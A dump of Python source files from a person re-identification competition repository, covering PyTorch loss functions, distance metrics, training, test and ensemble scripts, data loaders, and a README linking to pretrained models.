258, "path": "/tools/loss.py", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn import init\nfrom torch.nn.parameter import Parameter\nimport math\nimport numpy as np\nfrom .metric import *\n\n\nclass CrossEntropyLabelSmooth(nn.Module):\n\t'''\n\tCross entropy loss with label smoothing regularizer.\n\n\tReference:\n\tSzegedy et al. Rethinking the Inception Architecture for Computer Vision. CVPR 2016.\n\tEquation: y = (1 - epsilon) * y + epsilon / K.\n\n\tArgs:\n\t\tnum_classes (int): number of classes.\n\t\tepsilon (float): weight.\n\t'''\n\n\tdef __init__(self, num_classes, epsilon=0.1, use_gpu=True):\n\t\tsuper(CrossEntropyLabelSmooth, self).__init__()\n\t\tself.num_classes = num_classes\n\t\tself.epsilon = epsilon\n\t\tself.use_gpu = use_gpu\n\t\tself.logsoftmax = nn.LogSoftmax(dim=1)\n\n\tdef forward(self, inputs, targets):\n\t\t'''\n\t\tArgs:\n\t\t\tinputs: prediction matrix (before softmax) with shape (batch_size, num_classes)\n\t\t\ttargets: ground truth labels with shape (num_classes)\n\t\t'''\n\t\tlog_probs = self.logsoftmax(inputs)\n\t\ttargets = torch.zeros(log_probs.size()).scatter_(1, targets.unsqueeze(1).data.cpu(), 1)\n\t\tif self.use_gpu:\n\t\t\ttargets = targets.to(torch.device('cuda'))\n\t\ttargets = (1 - self.epsilon) * targets + self.epsilon / self.num_classes\n\t\tloss = (- targets * log_probs).mean(0).sum()\n\n\t\treturn loss\n\n\nclass RankingLoss:\n\n\tdef __init__(self):\n\t\tpass\n\n\tdef _label2similarity(sekf, label1, label2):\n\t\t'''\n\t\tcompute similarity matrix of label1 and label2\n\t\t:param label1: torch.Tensor, [m]\n\t\t:param label2: torch.Tensor, [n]\n\t\t:return: torch.Tensor, [m, n], {0, 1}\n\t\t'''\n\t\tm, n = len(label1), len(label2)\n\t\tl1 = label1.view(m, 1).expand([m, n])\n\t\tl2 = label2.view(n, 1).expand([n, m]).t()\n\t\tsimilarity = l1 == l2\n\t\treturn similarity\n\n\tdef _batch_hard(self, mat_distance, mat_similarity, more_similar):\n\n\t\tif more_similar is 'smaller':\n\t\t\tsorted_mat_distance, _ = torch.sort(mat_distance + (-9999999.) * (1 - mat_similarity), dim=1,\n\t\t\t\t\t\t\t\t\t\t\t\tdescending=True)\n\t\t\thard_p = sorted_mat_distance[:, 0]\n\t\t\tsorted_mat_distance, _ = torch.sort(mat_distance + (9999999.) * (mat_similarity), dim=1, descending=False)\n\t\t\thard_n = sorted_mat_distance[:, 0]\n\t\t\treturn hard_p, hard_n\n\n\t\telif more_similar is 'larger':\n\t\t\tsorted_mat_distance, _ = torch.sort(mat_distance + (9999999.) * (1 - mat_similarity), dim=1,\n\t\t\t\t\t\t\t\t\t\t\t\tdescending=False)\n\t\t\thard_p = sorted_mat_distance[:, 0]\n\t\t\tsorted_mat_distance, _ = torch.sort(mat_distance + (-9999999.) * (mat_similarity), dim=1, descending=True)\n\t\t\thard_n = sorted_mat_distance[:, 0]\n\t\t\treturn hard_p, hard_n\n\n\nclass TripletLoss(RankingLoss):\n\t'''\n\tCompute Triplet loss augmented with Batch Hard\n\tDetails can be seen in 'In defense of the Triplet Loss for Person Re-Identification'\n\t'''\n\n\tdef __init__(self, margin, metric):\n\t\t'''\n\t\t:param margin: float or 'soft', for MarginRankingLoss with margin and soft margin\n\t\t:param metric: l2 distance or cosine distance\n\t\t'''\n\t\tself.margin = margin\n\t\tself.margin_loss = nn.MarginRankingLoss(margin=margin)\n\t\tself.metric = metric\n\n\tdef __call__(self, emb1, emb2, emb3, label1, label2, label3):\n\t\t'''\n\t\t:param emb1: torch.Tensor, [m, dim]\n\t\t:param emb2: torch.Tensor, [n, dim]\n\t\t:param label1: torch.Tensor, [m]\n\t\t:param label2: torch.Tensor, [b]\n\t\t:return:\n\t\t'''\n\t\tif self.metric == 'cosine':\n\t\t\tmat_dist = cosine_dist(emb1, emb2)\n\t\t\tmat_sim = self._label2similarity(label1, label2)\n\t\t\thard_p, _ = self._batch_hard(mat_dist, mat_sim.float(), more_similar='larger')\n\n\t\t\tmat_dist = cosine_dist(emb1, emb3)\n\t\t\tmat_sim = self._label2similarity(label1, label3)\n\t\t\t_, hard_n = self._batch_hard(mat_dist, mat_sim.float(), more_similar='larger')\n\n\t\t\tmargin_label = -torch.ones_like(hard_p)\n\n\t\telif self.metric == 'euclidean':\n\t\t\tmat_dist = euclidean_dist(emb1, emb2)\n\t\t\tmat_sim = self._label2similarity(label1, label2)\n\t\t\thard_p, _ = self._batch_hard(mat_dist, mat_sim.float(), more_similar='smaller')\n\n\t\t\tmat_dist = euclidean_dist(emb1, emb3)\n\t\t\tmat_sim = self._label2similarity(label1, label3)\n\t\t\t_, hard_n = self._batch_hard(mat_dist, mat_sim.float(), more_similar='smaller')\n\n\t\t\tmargin_label = torch.ones_like(hard_p)\n\n\t\treturn self.margin_loss(hard_n, hard_p, margin_label)\n\n\nclass CBLoss(nn.Module):\n\n\tdef __init__(self, num_classes, samples_per_class, gamma=2, alpha=None, size_average=True):\n\t\tsuper(CBLoss, self).__init__()\n\t\tself.num_classes = num_classes\n\t\tself.samples_per_class = samples_per_class\n\t\tself.gamma = gamma\n\t\tself.alpha = alpha\n\t\tif isinstance(alpha, (float, int)):\n\t\t\tself.alpha = torch.Tensor([alpha, 1 - alpha])\n\t\tif isinstance(alpha, list):\n\t\t\tself.alpha = torch.Tensor(alpha)\n\t\tself.size_average = size_average\n\t\tself.logsoftmax = nn.LogSoftmax(dim=1)\n\n\tdef forward(self, inputs, targets):\n\t\tif inputs.dim() > 2:\n\t\t\tinputs = inputs.view(inputs.size(0), inputs.size(1), -1) \t# N,C,H,W => N,C,H*W\n\t\t\tinputs = inputs.transpose(1, 2) \t\t\t\t\t\t\t# N,C,H*W => N,H*W,C\n\t\t\tinputs = inputs.contiguous().view(-1, inputs.size(2))\t\t# N,H*W,C => N*H*W,C\n\n\t\ttargets = targets.view(-1, 1)\n\n\t\tlogpt = self.logsoftmax(inputs)\n\t\tlogpt = logpt.gather(1, targets)\n\t\tlogpt = logpt.view(-1)\n\n\t\tpt = logpt.exp()\n\n\t\tif self.alpha is not None:\n\t\t\tif self.alpha.type() != inputs.data.type():\n\t\t\t\tself.alpha = self.alpha.type_as(inputs.data)\n\t\t\tat = self.alpha.gather(0, targets.data.view(-1))\n\t\t\tlogpt = logpt * at\n\n\t\t# compute weights by the number of each class\n\t\tbeta = 1.0 - 1.0 / np.array(self.samples_per_class)\n\t\teffective_num = 1.0 - np.power(beta, self.samples_per_class)\n\t\tweights = (1.0 - beta) / np.array(effective_num)\n\t\tweights = weights / np.sum(weights) * self.num_classes\n\n\t\tbatch_weights = torch.Tensor([weights[i] for i in targets]).cuda()\n\t\tloss = -1 * (1 - pt) ** self.gamma * batch_weights * logpt\n\n\t\tif self.size_average:\n\t\t\treturn loss.mean()\n\t\telse:\n\t\t\treturn loss.sum()\n\n\nclass RankedListLoss(nn.Module):\n\n\tdef __init__(self, margin=None, alpha=None, tval=None):\n\t\tself.margin = margin\n\t\tself.alpha = alpha\n\t\tself.tval = tval\n\n\tdef normalize_rank(self, x, axis=-1):\n\t\t\"\"\"\n\t\tNormalizing to unit length along the specified dimension.\n\t\tArgs:\n\t\t x: pytorch Variable\n\t\tReturns:\n\t\t x: pytorch Variable, same shape as input\n\t\t\"\"\"\n\t\tx = 1. * x / (torch.norm(x, 2, axis, keepdim=True).expand_as(x) + 1e-12)\n\t\treturn x\n\n\tdef euclidean_dist_rank(self, x, y):\n\t\t\"\"\"\n\t\tArgs:\n\t\t x: pytorch Variable, with shape [m, d]\n\t\t y: pytorch Variable, with shape [n, d]\n\t\tReturns:\n\t\t dist: pytorch Variable, with shape [m, n]\n\t\t\"\"\"\n\t\tm, n = x.size(0), y.size(0)\n\t\txx = torch.pow(x, 2).sum(1, keepdim=True).expand(m, n)\n\t\tyy = torch.pow(y, 2).sum(1, keepdim=True).expand(n, m).t()\n\t\tdist = xx + yy\n\t\tdist.addmm_(1, -2, x, y.t())\n\t\tdist = dist.clamp(min=1e-12).sqrt() # for numerical stability\n\t\treturn dist\n\n\tdef rank_loss(self, dist_mat, labels, margin, alpha, tval):\n\t\t\"\"\"\n\t\tArgs:\n\t\t dist_mat: pytorch Variable, pair wise distance between samples, shape [N, N]\n\t\t labels: pytorch LongTensor, with shape [N]\n\t\t\"\"\"\n\t\tassert len(dist_mat.size()) == 2\n\t\tassert dist_mat.size(0) == dist_mat.size(1)\n\t\tN = dist_mat.size(0)\n\n\t\ttotal_loss = 0.0\n\t\tfor ind in range(N):\n\t\t\tis_pos = labels.eq(labels[ind])\n\t\t\tis_pos[ind] = 0\n\t\t\tis_neg = labels.ne(labels[ind])\n\n\t\t\tdist_ap = dist_mat[ind][is_pos]\n\t\t\tdist_an = dist_mat[ind][is_neg]\n\n\t\t\tap_is_pos = torch.clamp(torch.add(dist_ap, margin - alpha), min=0.0)\n\t\t\tap_pos_num = ap_is_pos.size(0) + 1e-5\n\t\t\tap_pos_val_sum = torch.sum(ap_is_pos)\n\t\t\tloss_ap = torch.div(ap_pos_val_sum, float(ap_pos_num))\n\n\t\t\tan_is_pos = torch.lt(dist_an, alpha)\n\t\t\tan_less_alpha = dist_an[an_is_pos]\n\t\t\tan_weight = torch.exp(tval * (-1 * an_less_alpha + alpha))\n\t\t\tan_weight_sum = torch.sum(an_weight) + 1e-5\n\t\t\tan_dist_lm = alpha - an_less_alpha\n\t\t\tan_ln_sum = torch.sum(torch.mul(an_dist_lm, an_weight))\n\t\t\tloss_an = torch.div(an_ln_sum, an_weight_sum)\n\n\t\t\ttotal_loss = total_loss + loss_ap + loss_an\n\t\ttotal_loss = total_loss * 1.0 / N\n\t\treturn total_loss\n\n\tdef __call__(self, global_feat, labels, normalize_feature=True):\n\t\tif normalize_feature:\n\t\t\tglobal_feat = self.normalize_rank(global_feat, axis=-1)\n\t\tdist_mat = self.euclidean_dist_rank(global_feat, global_feat)\n\t\ttotal_loss = self.rank_loss(dist_mat, labels, self.margin, self.alpha, self.tval)\n\n\t\treturn total_loss" }, { "alpha_fraction": 0.5443037748336792, "alphanum_fraction": 0.5845800042152405, "avg_line_length": 22.13888931274414, "blob_id": "d06377896fb974a1a0168bd139bd352fbcea09db", "content_id": "1507c79c828a7c1275f1dc2901432250387fb216", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 869, "license_type": "no_license", "max_line_length": 88, "num_lines": 36, "path": "/tools/metric.py", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "import torch\r\n\r\n\r\ndef cosine_dist(x, y):\r\n\t'''\r\n\r\n\t:param x: numpy.ndarray, 2d\r\n\t:param y: numpy.ndarray, 2d\r\n\t:return: torch.tensor, 2d\r\n\t'''\r\n\tbs1 = x.shape[0]\r\n\tbs2 = y.shape[0]\r\n\r\n\tfrac_up = torch.matmul(x, y.transpose(0, 1))\r\n\tfrac_down = (torch.sqrt(torch.sum(torch.pow(x, 2), 1))).view(bs1, 1).repeat(1, bs2) * \\\r\n\t (torch.sqrt(torch.sum(torch.pow(y, 2), 1))).view(1, bs2).repeat(bs1, 1)\r\n\tcosine = frac_up / frac_down\r\n\r\n\treturn cosine\r\n\r\n\r\ndef euclidean_dist(x, y):\r\n\t'''\r\n\r\n\t:param x: numpy.ndarray, 2d\r\n\t:param y: numpy.ndarray, 2d\r\n\t:return: torch.tensor, 2d\r\n\t'''\r\n\tm, n = x.shape[0], y.shape[0]\r\n\txx = torch.pow(x, 2).sum(1, keepdim=True).expand(m, n)\r\n\tyy = torch.pow(y, 2).sum(1, keepdim=True).expand(n, m).t()\r\n\tdist = xx + yy\r\n\tdist.addmm_(1, -2, x, y.t())\r\n\tdist = dist.clamp(min=1e-12).sqrt() # for numerical stability\r\n\t\r\n\treturn dist\r\n" }, { "alpha_fraction": 0.6639566421508789, "alphanum_fraction": 0.6789849996566772, "avg_line_length": 33.295650482177734, "blob_id": "57b71058a4f8f0457eafcdc186643bb7aa9a8632", "content_id": "3c3961cc8c89eef12aec20fc856f69fba3f7ce5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4059, "license_type": "no_license", "max_line_length": 117, "num_lines": 115, "path": "/main.py", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "import argparse\r\nimport os\r\nimport ast\r\nfrom core import Loaders, Base, train_an_epoch, test, ensemble\r\nfrom tools import make_dirs, Logger, os_walk, time_now\r\n\r\n\r\ndef main(config):\r\n\r\n\t# init loaders and base\r\n\tloaders = Loaders(config)\r\n\tbase = Base(config, loaders)\r\n\r\n\t# make directions\r\n\tmake_dirs(base.output_path)\r\n\tmake_dirs(base.save_dist_path)\r\n\tmake_dirs(base.save_json_path)\r\n\tmake_dirs(base.save_model_path)\r\n\tmake_dirs(base.save_log_path)\r\n\r\n\t# init logger\r\n\tlogger = Logger(os.path.join(os.path.join(os.path.join(config.output_path, config.model_name), 'logs/'), 'log.txt'))\r\n\tlogger('\\n')\r\n\tlogger(config)\r\n\r\n\t# train mode\r\n\tif config.mode == 'train':\r\n\r\n\t\t# resume model from the resume_train_epoch\r\n\t\tif config.resume_train_epoch >= 0:\r\n\t\t\tbase.resume_model(config.resume_train_epoch)\r\n\t\t\tstart_train_epoch = config.resume_train_epoch\r\n\t\telse:\r\n\t\t\tstart_train_epoch = 0\r\n\r\n\t\t# automatically resume model from the latest one\r\n\t\tif config.auto_resume_training_from_lastest_steps:\r\n\t\t\troot, _, files = os_walk(base.save_model_path)\r\n\t\t\tif len(files) > 0:\r\n\t\t\t\t# get indexes of saved models\r\n\t\t\t\tindexes = []\r\n\t\t\t\tfor file in files:\r\n\t\t\t\t\tindexes.append(int(file.replace('.pkl', '').split('_')[-1]))\r\n\t\t\t\tindexes = sorted(list(set(indexes)), reverse=False)\r\n\t\t\t\t# resume model from the latest model\r\n\t\t\t\tbase.resume_model(indexes[-1])\r\n\t\t\t\tstart_train_epoch = indexes[-1]\r\n\t\t\t\tlogger('Time: {}, automatically resume training from the latest step (model {})'.format(time_now(), indexes[-1]))\r\n\r\n\t\t# main loop\r\n\t\tfor current_epoch in range(start_train_epoch, config.total_train_epochs):\r\n\r\n\t\t\t# save model\r\n\t\t\tbase.save_model(current_epoch)\r\n\r\n\t\t\t# train\r\n\t\t\tbase.lr_scheduler.step(current_epoch)\r\n\t\t\t_, results = train_an_epoch(config, base, loaders)\r\n\t\t\tlogger('Time: {}; Epoch: {}; {}'.format(time_now(), current_epoch, results))\r\n\r\n\r\n\t# test mode\r\n\telif config.mode == 'test':\r\n\t\t# resume from the resume_test_epoch\r\n\t\tif config.resume_test_epoch >= 0:\r\n\t\t\tbase.resume_model(config.resume_test_epoch)\r\n\r\n\t\ttest(config, base, loaders)\r\n\r\n\r\n\t# ensemble mode\r\n\telif config.mode == 'ensemble':\r\n\r\n\t\tensemble(config, base, loaders)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n\tparser = argparse.ArgumentParser()\r\n\r\n\t# overall configuration\r\n\tparser.add_argument('--cuda', type=str, default='cuda')\r\n\tparser.add_argument('--mode', type=str, default='train', help='train, test or ensemble')\r\n\tparser.add_argument('--output_path', type=str, default='output', help='path to save models')\r\n\tparser.add_argument('--model_name', type=str, default='resnet101a_SA',\r\n\t\t\t\t\t\thelp='densenet161_CBL, resnet101a_RLL or resnet101a_SA')\r\n\r\n\t# dataset configuration\r\n\tparser.add_argument('--dataset_path', type=str, default='dataset')\r\n\tparser.add_argument('--image_size', type=int, nargs='+', default=[256, 128])\r\n\tparser.add_argument('--p', type=int, default=16, help='persons count in a batch')\r\n\tparser.add_argument('--k', type=int, default=4, help='images count of a person in a batch')\r\n\r\n\t# model configuration\r\n\tparser.add_argument('--pid_num', type=int, default=4768, help='labels count of train set')\r\n\tparser.add_argument('--margin', type=float, default=0.3, help='margin for the triplet loss with batch hard')\r\n\r\n\t# train configuration\r\n\tparser.add_argument('--milestones', nargs='+', type=int, default=[40, 70],\r\n\t\t\t\t\t\thelp='milestones for the learning rate decay')\r\n\tparser.add_argument('--base_learning_rate', type=float, default=0.00035)\r\n\tparser.add_argument('--weight_decay', type=float, default=0.0005)\r\n\tparser.add_argument('--resume_train_epoch', type=int, default=-1, help='-1 for no resuming')\r\n\tparser.add_argument('--total_train_epochs', type=int, default=120)\r\n\tparser.add_argument('--auto_resume_training_from_lastest_steps', type=ast.literal_eval, default=True)\r\n\tparser.add_argument('--max_save_model_num', type=int, default=1, help='0 for max num is infinit')\r\n\r\n\t# test configuration\r\n\tparser.add_argument('--resume_test_epoch', type=int, default=119, help='-1 for no resuming')\r\n\r\n\r\n\t# main\r\n\tconfig = parser.parse_args()\r\n\tmain(config)\r\n" }, { "alpha_fraction": 0.7295082211494446, "alphanum_fraction": 0.7950819730758667, "avg_line_length": 60, "blob_id": "b799569329766130ff20969cf8667fd6544284f6", "content_id": "d3db4d3d5f2a6f579ec1eba5a3ad5ab163d2330f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 132, "license_type": "no_license", "max_line_length": 61, "num_lines": 2, "path": "/core/pretrained/README.md", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "Please download pretrained models from the following url: \n链接: https://pan.baidu.com/s/1935MdSvnS1t6qo9TH-nXcQ 提取码: jk3d\n" }, { "alpha_fraction": 0.6617850065231323, "alphanum_fraction": 0.6722851395606995, "avg_line_length": 28.41176414489746, "blob_id": "2885ff669a5ba6f48eb0e2c4bf185d0d714d47f7", "content_id": "ee08fccce6cef7271af27245deb05786d86a5aad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3619, "license_type": "no_license", "max_line_length": 110, "num_lines": 119, "path": "/core/test.py", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "import os\r\nimport torch\r\nimport numpy as np\r\nfrom tools import CatMeter, cosine_dist, euclidean_dist, re_ranking\r\n\r\n\r\ndef generate_jsonfile(config, base, distmat, dataset, topk, json_name):\r\n\t\"\"\"\r\n\tArgs:\r\n\t\tdistmat (numpy.ndarray): distance matrix of shape (num_query, num_gallery).\r\n\t\tdataset (tuple): a 2-tuple containing (query, gallery), each of which contains tuples of (img_path(s), pid).\r\n\t\ttopk: return topk ranks.\r\n\t\"\"\"\r\n\r\n\tnum_q, num_g = distmat.shape\r\n\tindices = np.argsort(distmat, axis=1)\r\n\r\n\tquery, gallery = dataset\r\n\tassert num_q == len(query)\r\n\tassert num_g == len(gallery)\r\n\r\n\tprint('Compute result with top-{} ranks'.format(topk))\r\n\tprint('# query: {}\\n# gallery {}'.format(num_q, num_g))\r\n\r\n\tresult_dict = {}\r\n\tqlist = []\r\n\r\n\tfor q_idx in range(num_q):\r\n\t\tqimg_path, qpid = query[q_idx]\r\n\t\tquery_name = qimg_path.replace(os.path.join(config.dataset_path, 'query_b/'), '')\r\n\r\n\t\tg_num = 0\r\n\t\tglist = []\r\n\t\tglist.append(query_name)\r\n\t\tfor g_idx in indices[q_idx, :]:\r\n\t\t\tgimg_path, gpid = gallery[g_idx]\r\n\t\t\tgallery_name = gimg_path.replace(os.path.join(config.dataset_path, 'gallery_b/'), '')\r\n\r\n\t\t\tif g_num < topk:\r\n\t\t\t\tglist.append(gallery_name)\r\n\t\t\tg_num += 1\r\n\t\tqlist.append(glist)\r\n\r\n\tfor i in range(len(qlist)):\r\n\t\tfor j in range(1, len(qlist[i])):\r\n\t\t\tresult_dict.setdefault(qlist[i][0], []).append(qlist[i][j])\r\n\r\n\t# generate json\r\n\timport json\r\n\r\n\tjson = json.dumps(result_dict)\r\n\tjsonfile = json_name + '.json'\r\n\r\n\twith open(os.path.join(base.save_json_path, jsonfile), 'w') as f:\r\n\t\tf.write(json)\r\n\r\n\tprint(\"Successfully generate jsonfile: {}\".format(jsonfile))\r\n\r\n\r\ndef test(config, base, loaders):\r\n\r\n\tbase.set_eval()\r\n\r\n\t# meters\r\n\tquery_features_meter, gallery_features_meter = CatMeter(), CatMeter()\r\n\r\n\t# init dataset\r\n\t_datasets = [loaders.comp_query_samples.samples, loaders.comp_gallery_samples.samples]\r\n\t_loaders = [loaders.comp_query_loader, loaders.comp_gallery_loader]\r\n\r\n\t# compute query and gallery features\r\n\twith torch.no_grad():\r\n\t\tfor loader_id, loader in enumerate(_loaders):\r\n\t\t\tfor data in loader:\r\n\t\t\t\t# compute feautres\r\n\t\t\t\timages, _ = data\r\n\r\n\t\t\t\tif config.model_name == 'resnet101a_SA':\r\n\t\t\t\t\tfeatures, _ = base.model(images)\r\n\t\t\t\telse:\r\n\t\t\t\t\tfeatures = base.model(images)\r\n\r\n\t\t\t\t# save as query features\r\n\t\t\t\tif loader_id == 0:\r\n\t\t\t\t\tquery_features_meter.update(features.data)\r\n\t\t\t\t# save as gallery features\r\n\t\t\t\telif loader_id == 1:\r\n\t\t\t\t\tgallery_features_meter.update(features.data)\r\n\r\n\t# get torch.Tensor\r\n\tquery_features = query_features_meter.get_val()\r\n\tgallery_features = gallery_features_meter.get_val()\r\n\r\n\t# compute distance: cosine, euclidean distance or re-ranking\r\n\t# distance = -cosine_dist(query_features, gallery_features).data.cpu().numpy()\r\n\t# distance = euclidean_dist(query_features, gallery_features).data.cpu().numpy()\r\n\tdistance = re_ranking(query_features, gallery_features)\r\n\r\n\tnp.save(os.path.join(base.save_dist_path, config.model_name + '.npy'), distance)\r\n\r\n\t# generate submission file containing top-200 ranks\r\n\tgenerate_jsonfile(config, base, distance, _datasets, 200, config.model_name)\r\n\r\n\r\ndef ensemble(config, base, loaders):\r\n\r\n\tbase.set_eval()\r\n\r\n\t# init dataset\r\n\t_datasets = [loaders.comp_query_samples.samples, loaders.comp_gallery_samples.samples]\r\n\r\n\t# test_set B\r\n\tdist1 = np.load(os.path.join(base.save_dist_path, 'densenet161_CBL.npy'))\r\n\tdist2 = np.load(os.path.join(base.save_dist_path, 'resnet101a_RLL.npy'))\r\n\tdist3 = np.load(os.path.join(base.save_dist_path, 'resnet101a_SA.npy'))\r\n\r\n\tensemble_dist = dist1 + dist2 + 0.48 * dist3\r\n\r\n\tgenerate_jsonfile(config, base, ensemble_dist, _datasets, 200, 'ensemble')\r\n" }, { "alpha_fraction": 0.6219419836997986, "alphanum_fraction": 0.6418663263320923, "avg_line_length": 34.71171188354492, "blob_id": "229373922c30b588d0166edab772cf2aa96310ea", "content_id": "5a53789bf0a170e6781d521b3a5833b8ee09099c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3965, "license_type": "no_license", "max_line_length": 118, "num_lines": 111, "path": "/core/data_loader/__init__.py", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "import sys\nsys.path.append('../')\n\nimport torchvision.transforms as transforms\nfrom .dataset import *\nfrom .loader import *\nfrom tools import *\n\n\nclass Loaders:\n\n def __init__(self, config):\n\n self.transform_train = transforms.Compose([\n transforms.Resize(config.image_size, interpolation=3),\n transforms.RandomHorizontalFlip(p=0.5),\n transforms.Pad(10),\n transforms.RandomCrop(config.image_size),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n RandomErasing(probability=0.5, mean=[0.485, 0.456, 0.406])\n ])\n \n self.transform_test = transforms.Compose([\n transforms.Resize(config.image_size, interpolation=3),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n\n # dataset\n self.dataset_path = config.dataset_path\n\n # batch size\n self.p = config.p\n self.k = config.k\n\n # dataset paths\n self.samples_path = {\n 'comp_train': os.path.join(self.dataset_path, 'train_set/'),\n 'comp_test_query': os.path.join(self.dataset_path, 'query_b/'),\n 'comp_test_gallery': os.path.join(self.dataset_path, 'gallery_b/')}\n\n # label path\n self.label_path = os.path.join(self.dataset_path, 'train_list.txt')\n\n # load\n self._load()\n\n\n def _load(self):\n\n # train dataset and iter\n train_samples, self.num_train, self.samples_per_class = self._get_train_samples('comp_train', self.label_path)\n self.train_iter = self._get_uniform_iter(train_samples, self.transform_train, self.p, self.k)\n\n # test dataset and loader\n self.comp_query_samples, self.comp_gallery_samples = self._get_test_samples('comp_test')\n self.comp_query_loader = self._get_loader(self.comp_query_samples, self.transform_test, 128)\n self.comp_gallery_loader = self._get_loader(self.comp_gallery_samples, self.transform_test, 128)\n\n\n def _get_train_samples(self, train_dataset, label_path):\n\n train_samples_path = self.samples_path[train_dataset]\n samples = Comp_Train_Samples(train_samples_path, label_path)\n\n return samples, samples.num_train, samples.samples_per_class\n\n\n def _get_test_samples(self, test_dataset):\n\n query_data_path = self.samples_path[test_dataset + '_query']\n gallery_data_path = self.samples_path[test_dataset + '_gallery']\n\n query_samples = Comp_Test_Samples(query_data_path, reorder=False)\n gallery_samples = Comp_Test_Samples(gallery_data_path, reorder=False)\n\n return query_samples, gallery_samples\n\n\n def _get_uniform_iter(self, samples, transform, p, k):\n\n dataset = CompDataset(samples.samples, transform=transform)\n loader = data.DataLoader(dataset, batch_size=p * k, num_workers=8, drop_last=False,\n sampler=ClassUniformlySampler(dataset, class_position=1, k=k))\n iters = IterLoader(loader)\n\n return iters\n\n\n def _get_random_iter(self, samples, transform, batch_size):\n\n dataset = CompDataset(samples.samples, transform=transform)\n loader = data.DataLoader(dataset, batch_size=batch_size, num_workers=8, drop_last=False, shuffle=True)\n iters = IterLoader(loader)\n\n return iters\n\n\n def _get_random_loader(self, samples, transform, batch_size):\n\n dataset = CompDataset(samples.samples, transform=transform)\n loader = data.DataLoader(dataset, batch_size=batch_size, num_workers=8, drop_last=False, shuffle=True)\n return loader\n\n\n def _get_loader(self, samples, transform, batch_size):\n\n dataset = CompDataset(samples.samples, transform=transform)\n loader = data.DataLoader(dataset, batch_size=batch_size, num_workers=8, drop_last=False, shuffle=False)\n return loader\n\n" }, { "alpha_fraction": 0.6661229133605957, "alphanum_fraction": 0.6813485622406006, "avg_line_length": 29.66666603088379, "blob_id": "80e491027ef78f91155b776adfcba2042685dc6e", "content_id": "c96fe9615b9de25b831202dfec19e0ba7d6cf011", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1839, "license_type": "no_license", "max_line_length": 88, "num_lines": 60, "path": "/core/train.py", "repo_name": "SWRDFK/Comp_ReID-master", "src_encoding": "UTF-8", "text": "import torch\nfrom tools import *\n\n\ndef train_an_epoch(config, base, loaders):\n\n\tbase.set_train()\n\tmeter = MultiItemAverageMeter()\n\n\tbatch_size = config.p * config.k\n\tnum_batch = int(loaders.num_train / batch_size)\n\n\tfor _ in range(num_batch):\n\n\t\t# load a batch data\n\t\timgs, pids = loaders.train_iter.next_one()\n\t\timgs, pids = imgs.to(base.device), pids.to(base.device)\n\n\t\t# forward\n\t\t# features, cls_score = base.model(imgs, config.model_name)\n\t\tfeatures, cls_score = base.model(imgs)\n\n\t\t# CBL: use cb_loss and triplet_loss.\n\t\tif config.model_name == 'densenet161_CBL':\n\t\t\tide_loss = base.cb_criterion(cls_score, pids)\n\t\t\ttriplet_loss = base.triplet_criterion(features, features, features, pids, pids, pids)\n\n\t\t\tloss = ide_loss + triplet_loss\n\t\t\tacc = accuracy(cls_score, pids, [1])[0]\n\n\t\t# RLL: use ide_loss and ranked_list_loss.\n\t\telif config.model_name == 'resnet101a_RLL':\n\t\t\tide_loss = base.ide_criterion(cls_score, pids)\n\t\t\ttriplet_loss = base.ranked_criterion(features, pids)\n\n\t\t\tloss = ide_loss + triplet_loss\n\t\t\tacc = accuracy(cls_score, pids, [1])[0]\n\n\t\t# SA: use ide_loss and triplet_loss.\n\t\telif config.model_name == 'resnet101a_SA':\n\t\t\tide_loss1 = base.ide_criterion(cls_score[0], pids)\n\t\t\tide_loss2 = base.ide_criterion(cls_score[1], pids)\n\t\t\tide_loss3 = base.ide_criterion(cls_score[2], pids)\n\t\t\tide_loss4 = base.ide_criterion(cls_score[3], pids)\n\n\t\t\tide_loss = ide_loss1 + ide_loss2 + ide_loss3 + ide_loss4\n\t\t\ttriplet_loss = base.triplet_criterion(features, features, features, pids, pids, pids)\n\n\t\t\tloss = ide_loss + triplet_loss\n\t\t\tacc = accuracy(cls_score[3], pids, [1])[0]\n\n\t\t# optimize\n\t\tbase.optimizer.zero_grad()\n\t\tloss.backward()\n\t\tbase.optimizer.step()\n\n\t\t# record: ide_loss and triplet_loss\n\t\tmeter.update({'ide_loss': ide_loss, 'triplet_loss': triplet_loss, 'acc': acc})\n\n\treturn meter.get_val(), meter.get_str()" } ]
14
dbca-wa/proxmox-utils
https://github.com/dbca-wa/proxmox-utils
10eafed0cb93227fb3630d3a1a2419ee75c23b25
a31e8cb538c5954c8c9dc863a74b5d5b3fa0f949
dac51858681e1c41cacda209910141f789262d45
refs/heads/master
2020-03-18T16:06:39.379351
2018-06-19T05:18:28
2018-06-19T05:18:28
134,946,976
0
0
null
null
null
null
null
